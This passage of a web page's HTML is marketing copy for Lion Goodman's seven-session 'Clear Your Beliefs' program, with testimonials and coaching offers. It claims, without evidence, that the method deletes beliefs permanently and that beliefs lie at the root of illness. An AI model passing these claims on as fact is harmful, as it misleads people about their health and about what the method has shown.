any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a 